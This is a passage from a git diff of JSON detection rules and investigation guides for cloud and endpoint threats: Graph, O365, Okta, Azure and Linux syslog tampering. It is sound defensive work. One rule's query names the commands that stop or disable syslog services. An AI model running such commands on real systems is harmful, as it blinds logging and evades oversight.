By using pre-consented or trusted apps to interact with Microsoft Graph, attackers can perform actions on behalf of users without triggering conventional authentication alerts or requiring additional user interaction.\n\n### Possible investigation steps\n\n- Review `azure.graphactivitylogs.properties.user_principal_object_id` and correlate with recent sign-in logs for the associated user.\n- Determine whether `azure.graphactivitylogs.properties.app_id` is a known and approved application in your environment.\n- Investigate the `user_agent.original` field for signs of scripted access (e.g., automation tools or libraries).\n- Check the source IP address (`source.ip`) and geolocation data (`source.geo.*`) for unfamiliar origins.\n- Inspect `azure.graphactivitylogs.properties.scopes` to understand the level of access being requested by the app.\n- Examine any follow-up Graph API activity from the same `app_id` or `user_principal_object_id` for signs of data access or exfiltration.\n- Correlate with device or session ID fields (`azure.graphactivitylogs.properties.c_sid`, if present) to detect persistent or repeat activity.\n\n### False positive analysis\n\n- First-time use of a legitimate Microsoft or enterprise-approved application.\n- Developer or automation workflows initiating new Graph API requests.\n- Valid end-user activity following device reconfiguration or new client installation.\n- Maintain an allowlist of expected `app_id` values and known developer tools.\n- Suppress detections from known good `user_agent.original` strings or approved source IP ranges.\n- Use device and identity telemetry to distinguish trusted vs. unknown activity sources.\n- Combine with session risk or sign-in anomaly signals where available.\n\n### Response and remediation\n\n- Reach out to the user and verify whether they authorized the application access.\n- Revoke active OAuth tokens and reset credentials if unauthorized use is confirmed.\n- Search for additional Graph API calls made by the same `app_id` or `user_principal_object_id`.\n- Investigate whether sensitive resources (mail, files, Teams, contacts) were accessed.\n- Apply Conditional Access policies to limit Graph API access by app type, IP, or device state.\n- Restrict user consent for third-party apps and enforce admin approval workflows.\n- Monitor usage of new or uncommon `app_id` values across your tenant.\n- Provide user education on OAuth phishing tactics and reporting suspicious prompts.\n", - "query": "event.dataset: \"azure.graphactivitylogs\"\n and event.type: \"access\"\n and azure.graphactivitylogs.properties.c_idtyp: \"user\"\n", - "references": [ - "https://www.volexity.com/blog/2025/04/22/phishing-for-codes-russian-threat-actors-target-microsoft-365-oauth-workflows/" - ], - "related_integrations": [ - { - "package": "azure", - "version": "^1.0.0" - } - ], - "required_fields": [ - { - "ecs": false, - "name": "azure.graphactivitylogs.properties.c_idtyp", - "type": "unknown" - }, - { - "ecs": true, - "name": "event.dataset", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.type", - "type": "keyword" - } - ], - "risk_score": 21, - "rule_id": "2a3f38a8-204e-11f0-9c1f-f661ea17fbcd", - "severity": "low", - "tags": [ - "Domain: Cloud", - "Data Source: Azure", - "Data Source: Microsoft Graph", - "Data Source: Microsoft Graph Activity Logs", - "Resources: Investigation Guide", - "Use Case: Identity and Access Audit", - "Tactic: Initial Access" - ], - "threat": [ - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0001", - 
"name": "Initial Access", - "reference": "https://attack.mitre.org/tactics/TA0001/" - }, - "technique": [ - { - "id": "T1078", - "name": "Valid Accounts", - "reference": "https://attack.mitre.org/techniques/T1078/", - "subtechnique": [ - { - "id": "T1078.004", - "name": "Cloud Accounts", - "reference": "https://attack.mitre.org/techniques/T1078/004/" - } - ] - } - ] - } - ], - "timestamp_override": "event.ingested", - "type": "new_terms", - "version": 1 - }, - "id": "2a3f38a8-204e-11f0-9c1f-f661ea17fbcd_1", - "type": "security-rule" -} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/2d6f5332-42ea-11f0-b09a-f661ea17fbcd_3.json b/packages/security_detection_engine/kibana/security_rule/2d6f5332-42ea-11f0-b09a-f661ea17fbcd_3.json index 6743c8527d8..2523ece8360 100644 --- a/packages/security_detection_engine/kibana/security_rule/2d6f5332-42ea-11f0-b09a-f661ea17fbcd_3.json +++ b/packages/security_detection_engine/kibana/security_rule/2d6f5332-42ea-11f0-b09a-f661ea17fbcd_3.json @@ -24,6 +24,12 @@ "https://github.com/0xZDH/Omnispray", "https://github.com/0xZDH/o365spray" ], + "related_integrations": [ + { + "package": "azure", + "version": "^1.0.0" + } + ], "risk_score": 73, "rule_id": "2d6f5332-42ea-11f0-b09a-f661ea17fbcd", "severity": "high", diff --git a/packages/security_detection_engine/kibana/security_rule/2de10e77-c144-4e69-afb7-344e7127abd0_208.json b/packages/security_detection_engine/kibana/security_rule/2de10e77-c144-4e69-afb7-344e7127abd0_208.json deleted file mode 100644 index 2f4d3a17cc7..00000000000 --- a/packages/security_detection_engine/kibana/security_rule/2de10e77-c144-4e69-afb7-344e7127abd0_208.json +++ /dev/null @@ -1,89 +0,0 @@ -{ - "attributes": { - "author": [ - "Elastic", - "Austin Songer" - ], - "description": "Identifies accounts with a high number of single sign-on (SSO) logon errors. Excessive logon errors may indicate an attempt to brute force a password or SSO token.", - "false_positives": [ - "Automated processes that attempt to authenticate using expired credentials and unbounded retries may lead to false positives." - ], - "from": "now-20m", - "index": [ - "filebeat-*", - "logs-o365*" - ], - "language": "kuery", - "license": "Elastic License v2", - "name": "O365 Excessive Single Sign-On Logon Errors", - "note": "## Triage and analysis\n\n> **Disclaimer**:\n> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.\n\n### Investigating O365 Excessive Single Sign-On Logon Errors\n\nSingle Sign-On (SSO) in O365 streamlines user access by allowing one set of credentials for multiple applications. However, adversaries may exploit this by attempting brute force attacks to gain unauthorized access. 
The detection rule monitors for frequent SSO logon errors, signaling potential abuse, and helps identify compromised accounts by flagging unusual authentication patterns.\n\n### Possible investigation steps\n\n- Review the specific account(s) associated with the excessive SSO logon errors by examining the event logs filtered by the query fields, particularly focusing on the o365.audit.LogonError field with the value \"SsoArtifactInvalidOrExpired\".\n- Analyze the timestamps of the logon errors to determine if there is a pattern or specific time frame when the errors are occurring, which might indicate a targeted attack.\n- Check for any recent changes or unusual activities in the affected account(s), such as password changes, unusual login locations, or device changes, to assess if the account might be compromised.\n- Investigate the source IP addresses associated with the logon errors to identify if they are from known malicious sources or unusual locations for the user.\n- Correlate the logon error events with other security alerts or logs from the same time period to identify any related suspicious activities or potential indicators of compromise.\n- Contact the user(s) of the affected account(s) to verify if they experienced any issues with their account access or if they recognize the logon attempts, which can help determine if the activity is legitimate or malicious.\n\n### False positive analysis\n\n- High volume of legitimate user logins: Users who frequently log in and out of multiple O365 applications may trigger excessive logon errors. To manage this, create exceptions for known high-activity accounts.\n- Automated scripts or applications: Some automated processes may use outdated or incorrect credentials, leading to repeated logon errors. Identify and update these scripts to prevent false positives.\n- Password changes: Users who recently changed their passwords might experience logon errors if they have not updated their credentials across all devices and applications. Encourage users to update their credentials promptly.\n- Network issues: Temporary network disruptions can cause authentication errors. Monitor network stability and consider excluding errors during known network maintenance periods.\n- Multi-factor authentication (MFA) misconfigurations: Incorrect MFA settings can lead to logon errors. 
Verify and correct MFA configurations for affected users to reduce false positives.\n\n### Response and remediation\n\n- Immediately isolate the affected account by disabling it to prevent further unauthorized access attempts.\n- Conduct a password reset for the compromised account and enforce a strong password policy to mitigate the risk of future brute force attacks.\n- Review and analyze the account's recent activity logs to identify any unauthorized access or data exfiltration attempts.\n- Implement multi-factor authentication (MFA) for the affected account and other high-risk accounts to add an additional layer of security.\n- Notify the user of the affected account about the incident and provide guidance on recognizing phishing attempts and securing their credentials.\n- Escalate the incident to the security operations team for further investigation and to determine if additional accounts or systems have been compromised.\n- Update and enhance monitoring rules to detect similar patterns of excessive SSO logon errors, ensuring early detection of potential brute force attempts.", - "query": "event.dataset:o365.audit and event.provider:AzureActiveDirectory and event.category:authentication and o365.audit.LogonError:\"SsoArtifactInvalidOrExpired\"\n", - "related_integrations": [ - { - "package": "o365", - "version": "^2.0.0" - } - ], - "required_fields": [ - { - "ecs": true, - "name": "event.category", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.dataset", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.provider", - "type": "keyword" - }, - { - "ecs": false, - "name": "o365.audit.LogonError", - "type": "keyword" - } - ], - "risk_score": 73, - "rule_id": "2de10e77-c144-4e69-afb7-344e7127abd0", - "setup": "The Office 365 Logs Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", - "severity": "high", - "tags": [ - "Domain: Cloud", - "Data Source: Microsoft 365", - "Use Case: Identity and Access Audit", - "Tactic: Credential Access", - "Resources: Investigation Guide" - ], - "threat": [ - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0006", - "name": "Credential Access", - "reference": "https://attack.mitre.org/tactics/TA0006/" - }, - "technique": [ - { - "id": "T1110", - "name": "Brute Force", - "reference": "https://attack.mitre.org/techniques/T1110/" - } - ] - } - ], - "threshold": { - "field": [ - "user.id" - ], - "value": 5 - }, - "timestamp_override": "event.ingested", - "type": "threshold", - "version": 208 - }, - "id": "2de10e77-c144-4e69-afb7-344e7127abd0_208", - "type": "security-rule" -} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/2e56e1bc-867a-11ee-b13e-f661ea17fbcd_305.json b/packages/security_detection_engine/kibana/security_rule/2e56e1bc-867a-11ee-b13e-f661ea17fbcd_305.json deleted file mode 100644 index e2e51c0604e..00000000000 --- a/packages/security_detection_engine/kibana/security_rule/2e56e1bc-867a-11ee-b13e-f661ea17fbcd_305.json +++ /dev/null @@ -1,63 +0,0 @@ -{ - "attributes": { - "author": [ - "Elastic" - ], - "description": "Detects when a specific Okta actor has multiple sessions started from different geolocations. 
Adversaries may attempt to launch an attack by using a list of known usernames and passwords to gain unauthorized access to user accounts from different locations.", - "from": "now-30m", - "interval": "15m", - "language": "esql", - "license": "Elastic License v2", - "name": "Okta User Sessions Started from Different Geolocations", - "note": "## Triage and analysis\n\n### Investigating Okta User Sessions Started from Different Geolocations\n\nThis rule detects when a specific Okta actor has multiple sessions started from different geolocations. Adversaries may attempt to launch an attack by using a list of known usernames and passwords to gain unauthorized access to user accounts from different locations.\n\n#### Possible investigation steps:\n- Since this is an ES|QL rule, the `okta.actor.alternate_id` and `okta.client.id` values can be used to pivot into the raw authentication events related to this alert.\n- Identify the users involved in this action by examining the `okta.actor.id`, `okta.actor.type`, `okta.actor.alternate_id`, and `okta.actor.display_name` fields.\n- Determine the device client used for these actions by analyzing `okta.client.ip`, `okta.client.user_agent.raw_user_agent`, `okta.client.zone`, `okta.client.device`, and `okta.client.id` fields.\n- With Okta end users identified, review the `okta.debug_context.debug_data.dt_hash` field.\n - Historical analysis should indicate if this device token hash is commonly associated with the user.\n- Review the `okta.event_type` field to determine the type of authentication event that occurred.\n - If the event type is `user.authentication.sso`, the user may have legitimately started a session via a proxy for security or privacy reasons.\n - If the event type is `user.authentication.password`, the user may be using a proxy to access multiple accounts for password spraying.\n - If the event type is `user.session.start`, the source may have attempted to establish a session via the Okta authentication API.\n- Review the past activities of the actor(s) involved in this action by checking their previous actions.\n- Evaluate the actions that happened just before and after this event in the `okta.event_type` field to help understand the full context of the activity.\n - This may help determine the authentication and authorization actions that occurred between the user, Okta and application.\n\n### False positive analysis:\n- It is very rare that a legitimate user would have multiple sessions started from different geo-located countries in a short time frame.\n\n### Response and remediation:\n- If the user is legitimate and the authentication behavior is not suspicious based on device analysis, no action is required.\n- If the user is legitimate but the authentication behavior is suspicious, consider resetting passwords for the users involved and enabling multi-factor authentication (MFA).\n - If MFA is already enabled, consider resetting MFA for the users.\n- If any of the users are not legitimate, consider deactivating the user's account.\n- Conduct a review of Okta policies and ensure they are in accordance with security best practices.\n- Check with internal IT teams to determine if the accounts involved recently had MFA reset at the request of the user.\n - If so, confirm with the user this was a legitimate request.\n - If so and this was not a legitimate request, consider deactivating the user's account temporarily.\n - Reset passwords and reset MFA for the user.\n- If this is a false positive, consider adding the
`okta.debug_context.debug_data.dt_hash` field to the `exceptions` list in the rule.\n - This will prevent future occurrences of this event for this device from triggering the rule.\n - Alternatively adding `okta.client.ip` or a CIDR range to the `exceptions` list can prevent future occurrences of this event from triggering the rule.\n - This should be done with caution as it may prevent legitimate alerts from being generated.\n", - "query": "FROM logs-okta*\n| WHERE\n event.dataset == \"okta.system\"\n AND (event.action RLIKE \"user\\\\.authentication(.*)\" OR event.action == \"user.session.start\")\n AND okta.security_context.is_proxy != true and okta.actor.id != \"unknown\"\n AND event.outcome == \"success\"\n| KEEP event.action, okta.security_context.is_proxy, okta.actor.id, event.outcome, client.geo.country_name, okta.actor.alternate_id\n| STATS\n geo_auth_counts = COUNT_DISTINCT(client.geo.country_name)\n BY okta.actor.id, okta.actor.alternate_id\n| WHERE\n geo_auth_counts >= 2\n", - "references": [ - "https://developer.okta.com/docs/reference/api/system-log/", - "https://developer.okta.com/docs/reference/api/event-types/", - "https://www.elastic.co/security-labs/testing-okta-visibility-and-detection-dorothy", - "https://sec.okta.com/articles/2023/08/cross-tenant-impersonation-prevention-and-detection", - "https://www.rezonate.io/blog/okta-logs-decoded-unveiling-identity-threats-through-threat-hunting/", - "https://www.elastic.co/security-labs/monitoring-okta-threats-with-elastic-security", - "https://www.elastic.co/security-labs/starter-guide-to-understanding-okta" - ], - "risk_score": 47, - "rule_id": "2e56e1bc-867a-11ee-b13e-f661ea17fbcd", - "setup": "The Okta Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.\n", - "severity": "medium", - "tags": [ - "Use Case: Identity and Access Audit", - "Data Source: Okta", - "Tactic: Initial Access", - "Resources: Investigation Guide" - ], - "threat": [ - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0001", - "name": "Initial Access", - "reference": "https://attack.mitre.org/tactics/TA0001/" - }, - "technique": [ - { - "id": "T1078", - "name": "Valid Accounts", - "reference": "https://attack.mitre.org/techniques/T1078/", - "subtechnique": [ - { - "id": "T1078.004", - "name": "Cloud Accounts", - "reference": "https://attack.mitre.org/techniques/T1078/004/" - } - ] - } - ] - } - ], - "timestamp_override": "event.ingested", - "type": "esql", - "version": 305 - }, - "id": "2e56e1bc-867a-11ee-b13e-f661ea17fbcd_305", - "type": "security-rule" -} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/2e56e1bc-867a-11ee-b13e-f661ea17fbcd_308.json b/packages/security_detection_engine/kibana/security_rule/2e56e1bc-867a-11ee-b13e-f661ea17fbcd_308.json index fbcbe1128d9..c9fc62be923 100644 --- a/packages/security_detection_engine/kibana/security_rule/2e56e1bc-867a-11ee-b13e-f661ea17fbcd_308.json +++ b/packages/security_detection_engine/kibana/security_rule/2e56e1bc-867a-11ee-b13e-f661ea17fbcd_308.json @@ -20,6 +20,12 @@ "https://www.elastic.co/security-labs/monitoring-okta-threats-with-elastic-security", "https://www.elastic.co/security-labs/starter-guide-to-understanding-okta" ], + "related_integrations": [ + { + "package": "okta", + "version": "^3.0.0" + } + ], "risk_score": 47, "rule_id": "2e56e1bc-867a-11ee-b13e-f661ea17fbcd", "setup": "The Okta Fleet integration, Filebeat module, or similarly structured data is required to be compatible 
with this rule.\n", diff --git a/packages/security_detection_engine/kibana/security_rule/2f8a1226-5720-437d-9c20-e0029deb6194_212.json b/packages/security_detection_engine/kibana/security_rule/2f8a1226-5720-437d-9c20-e0029deb6194_212.json deleted file mode 100644 index 395ff309e62..00000000000 --- a/packages/security_detection_engine/kibana/security_rule/2f8a1226-5720-437d-9c20-e0029deb6194_212.json +++ /dev/null @@ -1,109 +0,0 @@ -{ - "attributes": { - "author": [ - "Elastic" - ], - "description": "Adversaries may attempt to disable the syslog service in an attempt to disrupt event logging and evade detection by security controls.", - "from": "now-9m", - "index": [ - "auditbeat-*", - "endgame-*", - "logs-crowdstrike.fdr*", - "logs-endpoint.events.process*", - "logs-sentinel_one_cloud_funnel.*" - ], - "language": "eql", - "license": "Elastic License v2", - "name": "Attempt to Disable Syslog Service", - "note": "## Triage and analysis\n\n> **Disclaimer**:\n> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.\n\n### Investigating Attempt to Disable Syslog Service\n\nSyslog is a critical component in Linux environments, responsible for logging system events and activities. Adversaries may target syslog to disable logging, thereby evading detection and obscuring their malicious actions. The detection rule identifies attempts to stop or disable syslog services by monitoring specific process actions and arguments, flagging suspicious commands that could indicate an attempt to impair logging defenses.\n\n### Possible investigation steps\n\n- Review the process details to identify the user account associated with the command execution, focusing on the process.name and process.args fields to determine if the action was legitimate or suspicious.\n- Check the system's recent login history and user activity to identify any unauthorized access attempts or anomalies around the time the syslog service was targeted.\n- Investigate the parent process of the flagged command to understand the context of its execution and determine if it was initiated by a legitimate application or script.\n- Examine other logs and alerts from the same host around the time of the event to identify any correlated suspicious activities or patterns that might indicate a broader attack.\n- Assess the system for any signs of compromise, such as unexpected changes in configuration files, unauthorized software installations, or unusual network connections, to determine if the attempt to disable syslog is part of a larger attack.\n\n### False positive analysis\n\n- Routine maintenance activities may trigger this rule, such as scheduled service restarts or system updates. To manage this, create exceptions for known maintenance windows or specific administrative accounts performing these tasks.\n- Automated scripts or configuration management tools like Ansible or Puppet might stop or disable syslog services as part of their operations. Identify these scripts and whitelist their execution paths or associated user accounts.\n- Testing environments often simulate service disruptions, including syslog, for resilience testing.
Exclude these environments from the rule or adjust the rule to ignore specific test-related processes.\n- Some legitimate software installations or updates may require stopping syslog services temporarily. Monitor installation logs and exclude these processes if they are verified as non-threatening.\n- In environments with multiple syslog implementations, ensure that the rule is not overly broad by refining the process arguments to match only the specific syslog services in use.\n\n### Response and remediation\n\n- Immediately isolate the affected system from the network to prevent further malicious activity and potential lateral movement by the adversary.\n- Terminate any suspicious processes identified in the alert, specifically those attempting to stop or disable syslog services, to restore normal logging functionality.\n- Restart the syslog service on the affected system to ensure that logging is re-enabled and operational, using commands like `systemctl start syslog` or `service syslog start`.\n- Conduct a thorough review of recent logs, if available, to identify any additional suspicious activities or indicators of compromise that may have occurred prior to the syslog service being disabled.\n- Escalate the incident to the security operations team for further investigation and to determine if the attack is part of a larger campaign or if other systems are affected.\n- Implement additional monitoring on the affected system and similar systems to detect any further attempts to disable logging services, using enhanced logging and alerting mechanisms.\n- Review and update access controls and permissions to ensure that only authorized personnel have the ability to modify or stop critical services like syslog, reducing the risk of future incidents.", - "query": "process where host.os.type == \"linux\" and event.action in (\"exec\", \"exec_event\", \"start\", \"ProcessRollup2\") and\n ( (process.name == \"service\" and process.args == \"stop\") or\n (process.name == \"chkconfig\" and process.args == \"off\") or\n (process.name == \"systemctl\" and process.args in (\"disable\", \"stop\", \"kill\"))\n ) and process.args in (\"syslog\", \"rsyslog\", \"syslog-ng\", \"syslog.service\", \"rsyslog.service\", \"syslog-ng.service\") and\nnot process.parent.name == \"rsyslog-rotate\"\n", - "references": [ - "https://www.elastic.co/security-labs/detecting-log4j2-with-elastic-security" - ], - "related_integrations": [ - { - "package": "endpoint", - "version": "^8.2.0" - }, - { - "package": "crowdstrike", - "version": "^1.1.0" - }, - { - "package": "sentinel_one_cloud_funnel", - "version": "^1.0.0" - } - ], - "required_fields": [ - { - "ecs": true, - "name": "event.action", - "type": "keyword" - }, - { - "ecs": true, - "name": "host.os.type", - "type": "keyword" - }, - { - "ecs": true, - "name": "process.args", - "type": "keyword" - }, - { - "ecs": true, - "name": "process.name", - "type": "keyword" - }, - { - "ecs": true, - "name": "process.parent.name", - "type": "keyword" - } - ], - "risk_score": 47, - "rule_id": "2f8a1226-5720-437d-9c20-e0029deb6194", - "setup": "## Setup\n\nThis rule requires data coming in from one of the following integrations:\n- Elastic Defend\n- Auditbeat\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. 
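For a broader hunt than the EQL rule above, a hedged ES|QL sketch can flatten `process.args` and pattern-match it for syslog-related services; the `logs-endpoint.events.process*` pattern is one of the rule's sources, and `host.name`/`user.name` are standard ECS fields assumed to be present in your data.

```esql
// Broad hunt for syslog service tampering on Linux hosts.
FROM logs-endpoint.events.process*
| WHERE host.os.type == "linux"
  AND process.name IN ("systemctl", "service", "chkconfig")
// MV_CONCAT joins the multivalued process.args field so it can be regex-matched.
| EVAL args_joined = MV_CONCAT(process.args, " ")
| WHERE args_joined RLIKE ".*(rsyslog|syslog-ng|syslog).*"
| KEEP @timestamp, host.name, user.name, process.name, args_joined, process.parent.name
| SORT @timestamp DESC
```

This intentionally drops the rule's stop/disable argument filter, so expect benign status checks in the results; it is a triage aid, not a replacement for the rule.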
Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n\n### Auditbeat Setup\nAuditbeat is a lightweight shipper that you can install on your servers to audit the activities of users and processes on your systems. For example, you can use Auditbeat to collect and centralize audit events from the Linux Audit Framework. You can also use Auditbeat to detect changes to critical files, like binaries and configuration files, and identify potential security policy violations.\n\n#### The following steps should be executed in order to add the Auditbeat on a Linux System:\n- Elastic provides repositories available for APT and YUM-based distributions. 
Note that we provide binary packages, but no source packages.\n- To install the APT and YUM repositories follow the setup instructions in this [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/setup-repositories.html).\n- To run Auditbeat on Docker follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/running-on-docker.html).\n- To run Auditbeat on Kubernetes follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/running-on-kubernetes.html).\n- For complete \u201cSetup and Run Auditbeat\u201d information refer to the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/setting-up-and-running.html).\n", - "severity": "medium", - "tags": [ - "Domain: Endpoint", - "OS: Linux", - "Use Case: Threat Detection", - "Tactic: Defense Evasion", - "Data Source: Elastic Endgame", - "Data Source: Elastic Defend", - "Data Source: Crowdstrike", - "Data Source: SentinelOne", - "Resources: Investigation Guide" - ], - "threat": [ - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0005", - "name": "Defense Evasion", - "reference": "https://attack.mitre.org/tactics/TA0005/" - }, - "technique": [ - { - "id": "T1562", - "name": "Impair Defenses", - "reference": "https://attack.mitre.org/techniques/T1562/", - "subtechnique": [ - { - "id": "T1562.001", - "name": "Disable or Modify Tools", - "reference": "https://attack.mitre.org/techniques/T1562/001/" - } - ] - } - ] - } - ], - "timestamp_override": "event.ingested", - "type": "eql", - "version": 212 - }, - "id": "2f8a1226-5720-437d-9c20-e0029deb6194_212", - "type": "security-rule" -} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/323cb487-279d-4218-bcbd-a568efe930c6_103.json b/packages/security_detection_engine/kibana/security_rule/323cb487-279d-4218-bcbd-a568efe930c6_103.json deleted file mode 100644 index f97c37ee1fd..00000000000 --- a/packages/security_detection_engine/kibana/security_rule/323cb487-279d-4218-bcbd-a568efe930c6_103.json +++ /dev/null @@ -1,88 +0,0 @@ -{ - "attributes": { - "author": [ - "Elastic" - ], - "description": "Identifies the deletion of a Network Watcher in Azure. Network Watchers are used to monitor, diagnose, view metrics, and enable or disable logs for resources in an Azure virtual network. An adversary may delete a Network Watcher in an attempt to evade defenses.", - "false_positives": [ - "Network Watcher deletions may be done by a system or network administrator. Verify whether the username, hostname, and/or resource name should be making changes in your environment. Network Watcher deletions by unfamiliar users or hosts should be investigated. If known behavior is causing false positives, it can be exempted from the rule." - ], - "from": "now-25m", - "index": [ - "filebeat-*", - "logs-azure*" - ], - "language": "kuery", - "license": "Elastic License v2", - "name": "Azure Network Watcher Deletion", - "note": "## Triage and analysis\n\n> **Disclaimer**:\n> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.\n\n### Investigating Azure Network Watcher Deletion\n\nAzure Network Watcher is a vital tool for monitoring and diagnosing network issues within Azure environments. 
It provides insights and logging capabilities crucial for maintaining network security. Adversaries may delete Network Watchers to disable these monitoring functions, thereby evading detection. The detection rule identifies such deletions by monitoring Azure activity logs for specific delete operations, flagging successful attempts as potential security threats.\n\n### Possible investigation steps\n\n- Review the Azure activity logs to confirm the deletion event by checking for the operation name \"MICROSOFT.NETWORK/NETWORKWATCHERS/DELETE\" and ensuring the event outcome is marked as \"Success\" or \"success\".\n- Identify the user or service principal responsible for the deletion by examining the associated user identity or service principal ID in the activity logs.\n- Investigate the timeline of events leading up to the deletion by reviewing related activity logs for any unusual or unauthorized access patterns or changes in permissions.\n- Assess the impact of the deletion by determining which resources were being monitored by the deleted Network Watcher and evaluating the potential security implications.\n- Check for any other suspicious activities or alerts in the Azure environment that may indicate a broader attack or compromise, focusing on defense evasion tactics.\n\n### False positive analysis\n\n- Routine maintenance activities by authorized personnel may trigger the deletion alert. Verify if the deletion aligns with scheduled maintenance and consider excluding these operations from alerts.\n- Automated scripts or tools used for infrastructure management might delete Network Watchers as part of their normal operation. Identify these scripts and whitelist their activity to prevent false positives.\n- Changes in network architecture or resource reallocation can lead to legitimate deletions. Review change management logs to confirm if the deletion was planned and adjust the detection rule to exclude these scenarios.\n- Test environments often undergo frequent changes, including the deletion of Network Watchers. If these environments are known to generate false positives, consider creating exceptions for specific resource groups or subscriptions associated with testing.\n\n### Response and remediation\n\n- Immediately isolate the affected Azure resources to prevent further unauthorized actions. This can be done by restricting network access or applying stricter security group rules.\n- Review Azure activity logs to identify the user or service principal responsible for the deletion. 
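To support the log review called out in these remediation steps, a minimal ES|QL sketch can list the successful deletions with actor context; the dataset and operation name come from the rule's query, while `user.name` and `source.ip` are assumptions about how the `azure.activitylogs` data is mapped in your environment.

```esql
// List successful Network Watcher deletions with basic actor context.
FROM logs-azure*
| WHERE event.dataset == "azure.activitylogs"
  AND azure.activitylogs.operation_name == "MICROSOFT.NETWORK/NETWORKWATCHERS/DELETE"
  AND TO_LOWER(event.outcome) == "success"
| KEEP @timestamp, user.name, source.ip, azure.activitylogs.operation_name, event.outcome
| SORT @timestamp DESC
```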
Verify if the action was authorized and investigate any suspicious accounts.\n- Restore the deleted Network Watcher by redeploying it in the affected regions to resume monitoring and logging capabilities.\n- Conduct a security review of the affected Azure environment to identify any other potential misconfigurations or unauthorized changes.\n- Implement stricter access controls and auditing for Azure resources, ensuring that only authorized personnel have the ability to delete critical monitoring tools like Network Watchers.\n- Escalate the incident to the security operations team for further investigation and to determine if additional security measures are necessary.\n- Enhance detection capabilities by ensuring that alerts for similar deletion activities are configured to notify the security team immediately.", - "query": "event.dataset:azure.activitylogs and azure.activitylogs.operation_name:\"MICROSOFT.NETWORK/NETWORKWATCHERS/DELETE\" and event.outcome:(Success or success)\n", - "references": [ - "https://docs.microsoft.com/en-us/azure/network-watcher/network-watcher-monitoring-overview" - ], - "related_integrations": [ - { - "integration": "activitylogs", - "package": "azure", - "version": "^1.0.0" - } - ], - "required_fields": [ - { - "ecs": false, - "name": "azure.activitylogs.operation_name", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.dataset", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.outcome", - "type": "keyword" - } - ], - "risk_score": 47, - "rule_id": "323cb487-279d-4218-bcbd-a568efe930c6", - "setup": "The Azure Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", - "severity": "medium", - "tags": [ - "Domain: Cloud", - "Data Source: Azure", - "Use Case: Network Security Monitoring", - "Tactic: Defense Evasion", - "Resources: Investigation Guide" - ], - "threat": [ - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0005", - "name": "Defense Evasion", - "reference": "https://attack.mitre.org/tactics/TA0005/" - }, - "technique": [ - { - "id": "T1562", - "name": "Impair Defenses", - "reference": "https://attack.mitre.org/techniques/T1562/", - "subtechnique": [ - { - "id": "T1562.001", - "name": "Disable or Modify Tools", - "reference": "https://attack.mitre.org/techniques/T1562/001/" - } - ] - } - ] - } - ], - "timestamp_override": "event.ingested", - "type": "query", - "version": 103 - }, - "id": "323cb487-279d-4218-bcbd-a568efe930c6_103", - "type": "security-rule" -} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/35ab3cfa-6c67-11ef-ab4d-f661ea17fbcc_104.json b/packages/security_detection_engine/kibana/security_rule/35ab3cfa-6c67-11ef-ab4d-f661ea17fbcc_104.json deleted file mode 100644 index 98fa7b41e66..00000000000 --- a/packages/security_detection_engine/kibana/security_rule/35ab3cfa-6c67-11ef-ab4d-f661ea17fbcc_104.json +++ /dev/null @@ -1,80 +0,0 @@ -{ - "attributes": { - "author": [ - "Elastic" - ], - "description": "Identifies potential brute-force attacks targeting Microsoft 365 user accounts by analyzing failed sign-in patterns in Microsoft Entra ID Sign-In Logs. This detection focuses on a high volume of failed interactive or non-interactive authentication attempts within a short time window, often indicative of password spraying, credential 